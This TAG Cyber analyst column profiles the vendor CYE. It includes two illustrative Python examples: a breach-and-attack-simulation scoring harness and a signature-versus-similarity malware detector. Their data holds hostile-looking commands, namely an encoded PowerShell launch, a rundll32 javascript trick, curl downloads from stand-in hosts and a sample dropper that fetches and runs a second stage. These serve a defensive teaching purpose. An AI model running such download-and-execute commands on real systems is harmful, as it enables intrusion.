Predictive Security Analytics for Production Assets

A recent phenomenon in enterprise security is the increased emphasis on continuous execution of attack scenarios, usually mapped to frameworks such as MITRE ATT&CK. Dubbed breach and attack simulation by some analysts, and continuous control validation by others, the technique uses automation to run each technique against the environment and demonstrate whether the targeted security controls prevent it, detect it, or allow it to proceed unchecked.
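
As an added illustration of the loop just described (example code written for this column, not CYE's platform or any vendor's product), the harness below runs ATT&CK-tagged scenarios against a stand-in environment and scores each one as PREVENTED, DETECTED, or MISSED from the telemetry the controls emit. The environment, its allowlist and egress policy, the detection rules, the technique IDs chosen, and the hostnames and paths are all constructed for the example.

```python
"""Minimal breach-and-attack-simulation scoring loop (constructed example)."""
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Set


@dataclass
class Environment:
    """Stand-in target: application allowlist, egress filter, two SIEM-style
    rules, and the telemetry they produce. Everything here is constructed."""
    allowed_binaries: Set[str] = field(
        default_factory=lambda: {"explorer.exe", "rundll32.exe", "curl.exe"})
    allowed_egress_ports: Set[int] = field(default_factory=lambda: {80, 443})
    # Detection rules: name -> predicate over one telemetry event line.
    rules: Dict[str, Callable[[str], bool]] = field(default_factory=lambda: {
        "encoded-powershell": lambda e: "powershell" in e and "-enc" in e,
        "rundll32-inline-script": lambda e: "rundll32" in e and "javascript:" in e,
    })
    telemetry: List[str] = field(default_factory=list)

    def _emit(self, event: str) -> None:
        """Record an event and let the detection rules fire on it."""
        self.telemetry.append(event)
        for name, matches in self.rules.items():
            if matches(event):
                self.telemetry.append(f"alert rule={name}")

    def execute(self, binary: str, cmdline: str) -> bool:
        """Process launch through the allowlist; True if it would have run."""
        if binary not in self.allowed_binaries:
            self.telemetry.append(f"block allowlist proc={binary}")
            return False
        self._emit(f"process proc={binary} cmdline={cmdline}")
        return True

    def connect(self, dest: str, port: int) -> bool:
        """Outbound connection through the egress filter; True if allowed."""
        if port not in self.allowed_egress_ports:
            self.telemetry.append(f"block egress dest={dest}:{port}")
            return False
        self._emit(f"netconn dest={dest}:{port}")
        return True


@dataclass
class Scenario:
    technique: str                         # MITRE ATT&CK technique ID
    name: str
    action: Callable[[Environment], bool]  # True if the adversary action succeeded


# Constructed scenarios; IDs and command lines are illustrative only.
SCENARIOS = [
    Scenario("T1059.001", "Encoded PowerShell one-liner",
             lambda env: env.execute("powershell.exe", "-nop -w hidden -enc SQBFAFgA")),
    Scenario("T1218.011", "Rundll32 inline script",
             lambda env: env.execute("rundll32.exe",
                                     'javascript:"\\..\\mshtml,RunHTMLApplication"')),
    Scenario("T1048.003", "Exfiltration over a non-standard port",
             lambda env: env.connect("203.0.113.9", 8443)),
    Scenario("T1105", "Tool download with the native curl binary",
             lambda env: env.execute("curl.exe",
                                     "-s http://203.0.113.9/p.bin -o C:\\Users\\Public\\p.bin")),
]


def run_scenario(env: Environment, scenario: Scenario) -> str:
    """Execute one scenario and score it from the telemetry it generated.
    Correlation is by position in the feed (a time window in a real run)."""
    start = len(env.telemetry)
    if not scenario.action(env):
        return "PREVENTED"            # a preventive control stopped the action
    new_events = env.telemetry[start:]
    if any(e.startswith("alert ") for e in new_events):
        return "DETECTED"             # action ran, but a rule fired on it
    return "MISSED"                   # action ran and nothing noticed: a control gap


def validate(scenarios: List[Scenario], env: Environment = None) -> Dict[str, str]:
    """Technique ID -> outcome for a full run."""
    if env is None:
        env = Environment()
    return {s.technique: run_scenario(env, s) for s in scenarios}


def summarize(results: Dict[str, str]) -> Dict[str, object]:
    """Counts per outcome plus the list of techniques that went unnoticed."""
    counts = {"PREVENTED": 0, "DETECTED": 0, "MISSED": 0}
    for outcome in results.values():
        counts[outcome] += 1
    gaps = sorted(t for t, o in results.items() if o == "MISSED")
    return {"counts": counts, "gaps": gaps}


if __name__ == "__main__":
    results = validate(SCENARIOS)
    for technique, outcome in results.items():
        print(f"{technique:<10} {outcome}")
    print(summarize(results))
```

The point of the MISSED bucket is the one a practitioner acts on: here the native curl download runs on an allowlisted binary over an allowed port and no rule fires, which is exactly the kind of gap a continuous run is meant to surface before an adversary does.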

Another recent phenomenon in enterprise security is the growth in vetted communities of hackers, organized to test target infrastructure on a continuous basis. Dubbed bug bounty by some analysts, and crowdsourced security testing by others, the technique uses the collective creativity of experts to find weaknesses in target infrastructure. This approach gives enterprise teams comfort that weaknesses are being discovered and reported rather than left for an adversary to find.

Yet another recent phenomenon in enterprise security involves the use of machine learning and related advanced analytics to detect previously unseen exploits. Such systems ingest malware or attack samples into a processing engine and derive features from them, so that new samples resembling the known ones can be flagged even when they do not match any existing signature. These advanced analytics complement traditional signature-based and behavioral approaches to improve detection accuracy and reduce false positives.
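
To make the contrast with signature matching concrete, here is an added example (written for this column, not CYE's engine or any product's code) that keeps an exact SHA-256 signature table beside a nearest-neighbour search over byte 4-gram sets with Jaccard similarity. The three samples, the sample name, the hostnames and the 0.5 threshold are all constructed for the example; a production engine would use richer features and a learned model, but the principle is the same.

```python
"""Signature lookup versus similarity to ingested samples (constructed example)."""
import hashlib
from typing import Dict, Set, Tuple

# --- constructed corpus -------------------------------------------------------
# A "known" dropper script, as it might arrive from a sandbox or sharing feed.
KNOWN_DROPPER = (
    b"#!/bin/sh\n"
    b"u=$(id -u); [ \"$u\" -eq 0 ] || exit 1\n"
    b"d=/tmp/.x; mkdir -p $d\n"
    b"curl -s http://c2.invalid/stage2 -o $d/s && chmod +x $d/s\n"
    b"nohup $d/s >/dev/null 2>&1 &\n"
)
# A rebuilt variant: new staging path and new hostname, same logic. Its hash
# differs from the known sample, so an exact signature cannot fire on it.
VARIANT = KNOWN_DROPPER.replace(b"c2.invalid", b"cdn-node.invalid").replace(
    b"/tmp/.x", b"/var/tmp/.y"
)
# An unrelated admin script that must not be flagged.
BENIGN_BACKUP = (
    b"#!/bin/sh\n"
    b"tar czf /backup/home-$(date +%F).tgz /home\n"
    b"find /backup -name '*.tgz' -mtime +30 -delete\n"
)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def byte_ngrams(data: bytes, n: int = 4) -> Set[bytes]:
    """Set of overlapping n-byte windows: an order-insensitive fingerprint."""
    return {data[i:i + n] for i in range(max(0, len(data) - n + 1))}


def jaccard(a: Set[bytes], b: Set[bytes]) -> float:
    """|A ∩ B| / |A ∪ B|; 0.0 for two empty sets."""
    union = a | b
    return len(a & b) / len(union) if union else 0.0


class SimilarityEngine:
    """Exact signatures plus nearest-neighbour similarity over an ingested corpus."""

    def __init__(self, threshold: float = 0.5, n: int = 4) -> None:
        self.threshold = threshold
        self.n = n
        self.signatures: Dict[str, str] = {}           # sha256 -> sample name
        self.fingerprints: Dict[str, Set[bytes]] = {}  # sample name -> n-gram set

    def ingest(self, name: str, sample: bytes) -> None:
        """Record both the exact hash and the fuzzy fingerprint of a sample."""
        self.signatures[sha256_hex(sample)] = name
        self.fingerprints[name] = byte_ngrams(sample, self.n)

    def nearest(self, sample: bytes) -> Tuple[str, float]:
        """Closest ingested sample by Jaccard similarity of n-gram sets."""
        fp = byte_ngrams(sample, self.n)
        best_name, best_score = "", 0.0
        for name, known_fp in self.fingerprints.items():
            score = jaccard(fp, known_fp)
            if score > best_score:
                best_name, best_score = name, score
        return best_name, best_score

    def classify(self, sample: bytes) -> Dict[str, object]:
        """Signature first (cheap, exact); fall back to similarity (fuzzy)."""
        digest = sha256_hex(sample)
        if digest in self.signatures:
            return {"verdict": "known-malicious", "signature_hit": True,
                    "nearest": self.signatures[digest], "score": 1.0}
        name, score = self.nearest(sample)
        verdict = "suspicious" if score >= self.threshold else "clean"
        return {"verdict": verdict, "signature_hit": False,
                "nearest": name, "score": round(score, 3)}


def build_engine() -> SimilarityEngine:
    """Engine with the single constructed known sample ingested."""
    engine = SimilarityEngine(threshold=0.5)
    engine.ingest("dropper-2020-04", KNOWN_DROPPER)
    return engine


if __name__ == "__main__":
    engine = build_engine()
    for label, sample in [("known", KNOWN_DROPPER), ("variant", VARIANT),
                          ("benign", BENIGN_BACKUP)]:
        print(f"{label:<8} {engine.classify(sample)}")
```

Run stand-alone, the known sample hits the signature, the variant misses the signature but scores well above the threshold against it, and the backup script scores near zero. The threshold is the tuning knob the paragraph alludes to: set it too low and benign scripts that share boilerplate start to look suspicious, which is where the false positives come from.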

This past week, the TAG Cyber analysts met with one of our industry’s great experts – Ronen Lago, who serves as CTO of Israel-based start-up CYE. Ronen has an impressive resume, having spent time working complex security issues at Lockheed Martin and Daimler AG – so we were keen to hear from him. Interestingly, we learned that CYE addresses each of the evolving enterprise security approaches mentioned above. Here is what I learned:

“At CYE, we focus on helping organizations determine their threat posture,” he explained. “We do this by targeting their business-critical production assets, mimicking realistic attack scenarios launched from the perspective of the external hacker. We then work with these targeted enterprise teams to provide a thorough assessment using our analytic tools, combined with the assistance of vetted expert security testers.”

I asked Lago about the decision at CYE to target actual production systems with the security tests, citing the more common approach we see at TAG Cyber, where vendors simulate the attacks adjacent to live infrastructure rather than against it: “That is the power of our solution,” he replied. “We give a realistic view of the true risks to production systems that exist within the enterprise. It results in the most accurate measure of security posture.”

The use of vetted security testers also seemed a unique aspect of this solution – one that introduced the power of crowdsourcing to the overall approach. Lago explained: “We rely on our vetted security experts to help us provide details of attacks to common systems, services, and applications, which we can then relay to our customers. Obviously, we manage and compensate this vetted team.”

The premium cyber security services from CYE are packaged into four offerings: continuous security assessment (using the technical approach outlined above), risk mitigation and strategic advisory services, supply chain risk assessment, and crisis management and incident response. These four offerings combine automated platform support with professional services from CYE experts.

I asked Lago about the challenges of combining platform support with consulting, and we both agreed on the pros and cons: “Our customers benefit from the combination of platform and professional services,” he said, “but we also understand the importance of scaling our automation to grow the business. We are working hard to develop and support the right balance between the two.”

Like all cyber security industry analysts, our TAG Cyber team feels the pull to report on vendors who fit neatly into a category. Such tidy coverage is much simpler than the alternative, and usually results in analyst guidance that matches the expectation of a reader. Covering a next-generation firewall or network access control vendor is straightforward, and doesn’t require a lot of pre-work to explain what’s being done.

But with vendors like CYE, who stretch their solution across multiple categories, including BAS, bug bounty, scanning, penetration testing, security analytics, risk scoring, and more, the analyst coverage is more difficult, but also more interesting. A similar situation exists for enterprise buyers, who might have to be creative in combining budget categories to select and purchase interesting tools like those from CYE.

My advice is that you contact Ronen Lago and his fine team at CYE and ask to hear the story. It’s fascinating to see how they’ve woven so many different types of controls into one commercial offering – and it’s great to hear the story from an expert with a background as rich as Lago’s. As always, please be sure to share back with us what you learn – and during these tough times across the world, please be safe and healthy.

We look forward to hearing from you.